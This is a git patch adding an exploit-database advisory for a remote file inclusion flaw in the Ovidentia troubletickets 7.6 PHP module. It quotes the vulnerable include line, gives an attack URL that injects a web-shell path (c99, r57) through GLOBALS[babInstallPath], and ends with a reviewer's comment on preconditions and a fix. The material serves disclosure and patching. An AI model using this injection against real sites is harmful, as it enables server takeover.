From 95ea5e17e0f45a1c21aac2e3f675645c2474e0dd Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 13 Apr 2016 05:03:50 +0000
Subject: [PATCH] DB: 2016-04-13 1 new exploits Ovidentia troubleticketsModule 7.6 - Remote File Inclusion
---
 files.csv | 1 +
 platforms/php/webapps/39688.txt | 24 ++++++++++++++++++++++++
 2 files changed, 25 insertions(+)
 create mode 100755 platforms/php/webapps/39688.txt
diff --git a/files.csv b/files.csv
index daa431661..1edb6b361 100755
--- a/files.csv
+++ b/files.csv
@@ -35907,3 +35907,4 @@ id,file,description,date,author,platform,type,port
 39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
 39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
+39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80
diff --git a/platforms/php/webapps/39688.txt b/platforms/php/webapps/39688.txt
new file mode 100755
index 000000000..a5ee7669d
--- /dev/null
+++ b/platforms/php/webapps/39688.txt
@@ -0,0 +1,24 @@
+# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
+# Author: bd0rk || SCHOOL-OF-HACK.NET
+# eMail: bd0rk[at]hackermail.com
+# Website: http://www.school-of-hack.net
+# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838
+
+Proof-of-Concept:
+
+Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]
+
+The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.
+ So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.
+ It's no problem to patch it!
+ Declare this parameter or use an alert!
+
+
+Greetings from bd0rk. HackThePlanet!
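Review bot: The advisory text added in 39688.txt never states the conditions under which the quoted `require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';` is reached with a request-controlled value, so a defender cannot judge exposure from it. From the quoted line alone this appears to need a direct request to the script on a PHP configuration with `register_globals` enabled (removed in PHP 5.4), plus `allow_url_include=On` for a remote source; I would add a header line such as `# Preconditions: register_globals=On, allow_url_include=On (verify against the module)`. The closing advice "Declare this parameter or use an alert!" is not actionable; a line like `Fix: set babInstallPath from the application's own configuration and refuse direct requests to programs/statistique_evolution.php` would state the mitigation concretely. The `[SHELLCODE]` placeholder is also a misnomer, since what the parameter carries is an include path, not shellcode.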